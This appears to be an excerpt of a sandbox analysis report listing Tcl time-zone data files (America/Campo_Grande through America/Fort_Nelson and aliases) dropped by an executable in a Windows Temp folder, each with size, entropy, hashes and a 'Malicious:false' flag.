                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7778
                                                                                                                                                                                                                                                    Entropy (8bit):3.7685935760913543
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Campo_Grande) {. {-9223372036854775808 -13108 0 LMT}. {-1767212492 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1365
                                                                                                                                                                                                                                                    Entropy (8bit):3.9551252054637245
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cancun) {. {-9223372036854775808 -20824 0 LMT}. {-1514743200 -21600 0 CST}. {377935200 -18000 0 EST}. {828860400 -14400 1 EDT}. {846396000 -18000 0 EST}. {860310000 -14400 1 EDT}. {877845600 -18000 0 EST}. {891759600 -14400 1 EDT}. {902041200 -18000 0 CDT}. {909298800 -21600 0 CST}. {923212800 -18000 1 CDT}. {941353200 -21600 0 CST}. {954662400 -18000 1 CDT}. {972802800 -21600 0 CST}. {989136000 -18000 1 CDT}. {1001833200 -21600 0 CST}. {1018166400 -18000 1 CDT}. {1035702000 -21600 0 CST}. {1049616000 -18000 1 CDT}. {1067151600 -21600 0 CST}. {1081065600 -18000 1 CDT}. {1099206000 -21600 0 CST}. {1112515200 -18000 1 CDT}. {1130655600 -21600 0 CST}. {1143964800 -18000 1 CDT}. {1162105200 -21600 0 CST}. {1175414400 -18000 1 CDT}. {1193554800 -21600 0 CST}. {1207468800 -18000 1 CDT}. {1225004400 -21600 0 CST}. {1238918400 -18000 1 CD
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):240
                                                                                                                                                                                                                                                    Entropy (8bit):4.74219167348714
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Caracas) {. {-9223372036854775808 -16064 0 LMT}. {-2524505536 -16060 0 CMT}. {-1826739140 -16200 0 VET}. {-157750200 -14400 0 VET}. {1197183600 -16200 0 VET}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):222
                                                                                                                                                                                                                                                    Entropy (8bit):4.615632762186706
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Catamarca)]} {. LoadTimeZoneFile America/Argentina/Catamarca.}.set TZData(:America/Catamarca) $TZData(:America/Argentina/Catamarca).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                                                    Entropy (8bit):4.877199904694429
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cayenne) {. {-9223372036854775808 -12560 0 LMT}. {-1846269040 -14400 0 GFT}. {-71092800 -10800 0 GFT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5249
                                                                                                                                                                                                                                                    Entropy (8bit):3.7874190587323255
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cayman) {. {-9223372036854775808 -19532 0 LMT}. {-2524502068 -18431 0 KMT}. {-1827687169 -18000 0 EST}. {1451624400 -18000 0 EST}. {1457852400 -14400 1 EDT}. {1478412000 -18000 0 EST}. {1489302000 -14400 1 EDT}. {1509861600 -18000 0 EST}. {1520751600 -14400 1 EDT}. {1541311200 -18000 0 EST}. {1552201200 -14400 1 EDT}. {1572760800 -18000 0 EST}. {1583650800 -14400 1 EDT}. {1604210400 -18000 0 EST}. {1615705200 -14400 1 EDT}. {1636264800 -18000 0 EST}. {1647154800 -14400 1 EDT}. {1667714400 -18000 0 EST}. {1678604400 -14400 1 EDT}. {1699164000 -18000 0 EST}. {1710054000 -14400 1 EDT}. {1730613600 -18000 0 EST}. {1741503600 -14400 1 EDT}. {1762063200 -18000 0 EST}. {1772953200 -14400 1 EDT}. {1793512800 -18000 0 EST}. {1805007600 -14400 1 EDT}. {1825567200 -18000 0 EST}. {1836457200 -14400 1 EDT}. {1857016800 -18000 0 EST}. {18679068
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):11003
                                                                                                                                                                                                                                                    Entropy (8bit):3.728817385585057
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Chicago) {. {-9223372036854775808 -21036 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-1577901600 -21600 0 CST}. {-1563724800 -18000 1 CDT}. {-1551632400 -21600 0 CST}. {-1538928000 -18000 1 CDT}. {-1520182800 -21600 0 CST}. {-1504454400 -18000 1 CDT}. {-1491757200 -21600 0 CST}. {-1473004800 -18000 1 CDT}. {-1459702800 -21600 0 CST}. {-1441555200 -18000 1 CDT}. {-1428253200 -21600 0 CST}. {-1410105600 -18000 1 CDT}. {-1396803600 -21600 0 CST}. {-1378656000 -18000 1 CDT}. {-1365354000 -21600 0 CST}. {-1347206400 -18000 1 CDT}. {-1333904400 -21600 0 CST}. {-1315152000 -18000 1 CDT}. {-1301850000 -21600 0 CST}. {-1283702400 -18000 1 CDT}. {-1270400400 -21600 0 CST}. {-1252252800 -18000 1 CDT}. {-1238950800 -21600 0 CST}. {-1220803200
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6593
                                                                                                                                                                                                                                                    Entropy (8bit):3.795313170000037
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Chihuahua) {. {-9223372036854775808 -25460 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {820476000 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {883634400 -21600 0 CST}. {891766800 -21600 0 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -21600 1 MDT}. {1162108800 -25
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):193
                                                                                                                                                                                                                                                    Entropy (8bit):4.822360211437507
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Atikokan)]} {. LoadTimeZoneFile America/Atikokan.}.set TZData(:America/Coral_Harbour) $TZData(:America/Atikokan).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):214
                                                                                                                                                                                                                                                    Entropy (8bit):4.74004515366486
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Cordoba)]} {. LoadTimeZoneFile America/Argentina/Cordoba.}.set TZData(:America/Cordoba) $TZData(:America/Argentina/Cordoba).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):416
                                                                                                                                                                                                                                                    Entropy (8bit):4.443696146912203
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Costa_Rica) {. {-9223372036854775808 -20173 0 LMT}. {-2524501427 -20173 0 SJMT}. {-1545071027 -21600 0 CST}. {288770400 -18000 1 CDT}. {297234000 -21600 0 CST}. {320220000 -18000 1 CDT}. {328683600 -21600 0 CST}. {664264800 -18000 1 CDT}. {678344400 -21600 0 CST}. {695714400 -18000 1 CDT}. {700635600 -21600 0 CST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):211
                                                                                                                                                                                                                                                    Entropy (8bit):4.798554218839104
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Creston) {. {-9223372036854775808 -27964 0 LMT}. {-2713882436 -25200 0 MST}. {-1680454800 -28800 0 PST}. {-1627833600 -25200 0 MST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7771
                                                                                                                                                                                                                                                    Entropy (8bit):3.7617088302190878
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cuiaba) {. {-9223372036854775808 -13460 0 LMT}. {-1767212140 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}. {5
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.902826505851901
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Curacao) {. {-9223372036854775808 -16547 0 LMT}. {-1826738653 -16200 0 ANT}. {-157750200 -14400 0 AST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1105
                                                                                                                                                                                                                                                    Entropy (8bit):4.067921329211614
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7609
                                                                                                                                                                                                                                                    Entropy (8bit):3.785302701923574
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1876
                                                                                                                                                                                                                                                    Entropy (8bit):3.9458112723626755
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8629
                                                                                                                                                                                                                                                    Entropy (8bit):3.76966035849006
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8068
                                                                                                                                                                                                                                                    Entropy (8bit):3.7425385734246395
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):203
                                                                                                                                                                                                                                                    Entropy (8bit):4.856609165175433
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Dominica) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8435
                                                                                                                                                                                                                                                    Entropy (8bit):3.7724320820194475
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:7tGVgeb0Gm+qI1zXN+C2mWBNQMsmNTxf6AeO+cblX:7heJ/UC2mWBNwWTxyWR
                                                                                                                                                                                                                                                    MD5:FECBDD64036247B2FBB723ADD8F798F6
                                                                                                                                                                                                                                                    SHA1:60B1719958AD6151CDB174A319A396D5F48C7CF1
                                                                                                                                                                                                                                                    SHA-256:EC95041E0A97B37A60EF16A6FA2B6BCB1EBEFABBC9468B828D0F467595132BC2
                                                                                                                                                                                                                                                    SHA-512:7CF94EC5040F4C8FA3C6ED30CFDAB59A199C18AA0CDA9A66D1A477F15563D2B7CB872CEEF1E2295E0F3B9A85508A03AEC29E3ECEBE11D9B089A92794D510BA00
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Edmonton) {. {-9223372036854775808 -27232 0 LMT}. {-1998663968 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1600614000 -21600 1 MDT}. {-1596816000 -25200 0 MST}. {-1567954800 -21600 1 MDT}. {-1551628800 -25200 0 MST}. {-1536505200 -21600 1 MDT}. {-1523203200 -25200 0 MST}. {-1504450800 -21600 1 MDT}. {-1491753600 -25200 0 MST}. {-1473001200 -21600 1 MDT}. {-1459699200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-715791600 -21600 1 MDT}. {-702489600 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {136371600 -21600 1 MDT}. {152092800 -25200 0 MST}. {167821200 -21600 1 MDT}. {183542400
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1204
                                                                                                                                                                                                                                                    Entropy (8bit):4.002813077550268
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQOX9eptVwss/uS+L/ux+y/up+a/uj+Ne/ud+Rs/uX4+G/u43+a/uo8+h/u1F+E6:5OXUCsQt8uqwd4rghFGRhGj+tX1R+fGV
                                                                                                                                                                                                                                                    MD5:FE8C264F158AC2CFCDD84B6F19B289FD
                                                                                                                                                                                                                                                    SHA1:520680554C4158EFDCC9C22CE1CADF7333D3086A
                                                                                                                                                                                                                                                    SHA-256:31C865E8706450440DB39B18236A60B33326D33D288BD0EB7FCB220A9DB1AB42
                                                                                                                                                                                                                                                    SHA-512:2985F8905C1FC3DD54BFD2D166CBF8621A18A19F95989BC24E0D7FF28700AF3230117B6EAA8D35200C7FE0A41AE3DE328C5D795F551B424AFFFDDBD2B8EBDDF0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Eirunepe) {. {-9223372036854775808 -16768 0 LMT}. {-1767208832 -18000 0 ACT}. {-1206950400 -14400 1 ACST}. {-1191355200 -18000 0 ACT}. {-1175367600 -14400 1 ACST}. {-1159819200 -18000 0 ACT}. {-633812400 -14400 1 ACST}. {-622062000 -18000 0 ACT}. {-602276400 -14400 1 ACST}. {-591825600 -18000 0 ACT}. {-570740400 -14400 1 ACST}. {-560203200 -18000 0 ACT}. {-539118000 -14400 1 ACST}. {-531345600 -18000 0 ACT}. {-191358000 -14400 1 ACST}. {-184190400 -18000 0 ACT}. {-155156400 -14400 1 ACST}. {-150062400 -18000 0 ACT}. {-128890800 -14400 1 ACST}. {-121118400 -18000 0 ACT}. {-99946800 -14400 1 ACST}. {-89582400 -18000 0 ACT}. {-68410800 -14400 1 ACST}. {-57960000 -18000 0 ACT}. {499755600 -14400 1 ACST}. {511243200 -18000 0 ACT}. {530600400 -14400 1 ACST}. {540273600 -18000 0 ACT}. {562136400 -14400 1 ACST}. {571204800 -18000 0 ACT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):269
                                                                                                                                                                                                                                                    Entropy (8bit):4.7060952459188305
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X529078iwTm2OHvJ4YRIgdrV/uFn/acD3/uFn/sVn:MBp5290785mdHx4YlB/uFn/z/uFn/U
                                                                                                                                                                                                                                                    MD5:77BE2E0759A3B7227B4DAC601A670D03
                                                                                                                                                                                                                                                    SHA1:1FB09211F291E5B1C5CC9848EB53106AF48EE830
                                                                                                                                                                                                                                                    SHA-256:40994535FE02326EA9E373F54CB60804BA7AE7162B52EA5F73497E7F72F2D482
                                                                                                                                                                                                                                                    SHA-512:EB5E6A4A912053E399F6225A02DDC524A223D4A5724165CAD9009F1FA10B042F971E52CE17B395A86BC80FCC6897FD2CCC3B00708506FEF39E4D71812F5DF595
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/El_Salvador) {. {-9223372036854775808 -21408 0 LMT}. {-1546279392 -21600 0 CST}. {547020000 -18000 1 CDT}. {559717200 -21600 0 CST}. {578469600 -18000 1 CDT}. {591166800 -21600 0 CST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):185
                                                                                                                                                                                                                                                    Entropy (8bit):4.786739478919165
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqx0qfSwVAIg20qfo2IAcGE7JM7QIAcGEqfu:SlSWB9IZaM3y7eHVAIgpeo2907390eu
                                                                                                                                                                                                                                                    MD5:74AB4664E80A145D808CAB004A22859B
                                                                                                                                                                                                                                                    SHA1:2AF7665C4E155A227B3F76D1C4BC87854C25A6CB
                                                                                                                                                                                                                                                    SHA-256:BDD0893AA5D170F388B1E93CE5FE2EDF438866707E52033E49898AFC499F86C5
                                                                                                                                                                                                                                                    SHA-512:CCC2E75E07BA1CAAFD1149A22D07668D191594272922AA2A1CE6DE628A8FF49AD90AA8BFE75C005328820C700B991AD87A6F40DEB5AD519B2708D8F7BF04E5A0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Tijuana)]} {. LoadTimeZoneFile America/Tijuana.}.set TZData(:America/Ensenada) $TZData(:America/Tijuana).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4427
                                                                                                                                                                                                                                                    Entropy (8bit):3.8109873978594053
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5aIl06OIRkf12fZGJ5LB6xfZ89Cf5udCLA9ZClqs/K+ff0t9:sIlWf/5LB6xR89C8CgZCHtffW9
                                                                                                                                                                                                                                                    MD5:90BBD338049233FAC5596CC63AA0D5B6
                                                                                                                                                                                                                                                    SHA1:D96282F5B57CBF823D5A1C1FDDE7907B74DAD770
                                                                                                                                                                                                                                                    SHA-256:DD21597BA97FD6591750E83CC00773864D658F32653017C4B52285670FFE52E3
                                                                                                                                                                                                                                                    SHA-512:3B0F5801E55EBBB7B4C0F74DDBD3469B8F4C2BFC1B44CC80B0D36DA2152C837C8176695945F61FA75664C04F1266BCA0564815307A2C27E783CD3348C4451E4A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Fort_Nelson) {. {-9223372036854775808 -29447 0 LMT}. {-2713880953 -28800 0 PST}. {-1632060000 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-757353600 -28800 0 PST}. {-725817600 -28800 0 PST}. {-715788000 -25200 1 PDT}. {-702486000 -28800 0 PST}. {-684338400 -25200 1 PDT}. {-671036400 -28800 0 PST}. {-652888800 -25200 1 PDT}. {-639586800 -28800 0 PST}. {-620834400 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589384800 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557935200 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526485600 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-3
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):226
                                                                                                                                                                                                                                                    Entropy (8bit):4.730673843485836
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9IZaM3y73GK7mFVAIgp3GKBL290HXYAp4903GK1:MBaIMY3GK7Hp3GKBL290Hz4903GK1
                                                                                                                                                                                                                                                    MD5:4685E4E850E0B6669F72B8E1B4314A0A
                                                                                                                                                                                                                                                    SHA1:BC6CCD58A2977A1E125B21D7B8FD57E800E624E1
                                                                                                                                                                                                                                                    SHA-256:D35F335D6F575F95CEA4FF53382C0BE0BE94BE7EB8B1E0CA3B7C50E8F7614E4E
                                                                                                                                                                                                                                                    SHA-512:867003B33A5FC6E42D546FBFC7A8AB351DE72232B89BA1BEC6DB566F6DCE135E65C08DE9112837190EB21D677E2F83E7E0F6049EC70CB9E36F223DE3A68E000A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
